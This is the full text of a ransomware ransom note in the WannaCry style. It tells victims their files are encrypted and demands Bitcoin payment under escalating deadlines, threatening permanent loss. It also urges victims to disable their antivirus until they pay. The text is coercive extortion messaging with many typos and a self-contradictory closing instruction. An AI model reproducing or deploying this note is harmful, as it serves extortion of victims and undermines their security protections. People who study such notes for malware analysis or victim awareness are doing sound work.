Ooops, your files have been encrypted!

What Happened to My Computer?
Your important files are encrypted. 
Many of your documents, photos, videos, database, and other files are no
longer accessible because they have been encrypted. Maybe you are busy looking
for a way to recover your files, but do not waste your time. Nobody can recover your files
without our decryption service.

Can I Recover My Files
Sure. We guarantee that you can recover all your files safely and easily. Buy you have
not so enough time. 
You can decrypt some of your files for free. Try now by clicking <Decrypt>. But if you want some
of your files you may need to pay. You only have 3 days to submit the payment. After that the price
will be doubled. Also, if you don'y pay in 7 days, you won't be able ro recover your files forever.
We will have free events for users who are so poor that they couldn't pay in 6 months. 

How Do I Pay?
Payment is accepted in Bitcoin only. For more information, click <About bitcoin>. Please check
the current price of Bitcoin and buy some bitcoins. For more information, click <How to buy bitcoin>.
Andd send the correct amount to the address specified in this window. After your payment, click <Check Payment>.
Best time to check: 9:00am - 11:00am.
GMT from Monday to Friday.
Once the payment is checked, you can start decryting your files immediately.

Contact
If you need assistance, send a message by clicking <Contact Us>

We strongly recommend you to not remove, and disable your anti-virus for a while, until 
you pay and the payment gets processed. If your anti-virus gets uploaded and removed automatically,
it will not be able to recover your files even if you pay.

We strongly recommend you to not remove this software